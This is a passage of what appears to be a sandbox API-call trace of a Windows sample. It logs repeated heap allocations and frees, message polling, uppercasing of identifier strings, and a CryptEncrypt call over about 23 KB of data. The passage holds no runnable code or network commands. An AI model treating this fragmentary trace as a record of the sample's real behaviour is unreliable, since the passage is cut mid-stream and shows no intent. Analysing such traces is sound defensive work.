out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0223.107] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0223.107] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0223.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0223.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0223.109] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0223.109] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.109] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9b0 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74700 [0223.109] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0223.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0223.109] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0223.110] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0223.110] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.111] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74700 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.111] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0223.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0223.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0223.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0223.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0223.112] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab848 [0223.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.112] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0223.112] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.112] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0223.112] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0223.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9b580 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0223.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.116] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x5c0d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5c10) returned 1 [0223.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.116] CharLowerBuffW (in: lpsz="byte[23568]", cchLength=0xb | out: lpsz="byte[23568]") returned 0xb [0223.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.118] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.118] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.118] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.118] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.118] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.118] PeekMessageW (in: 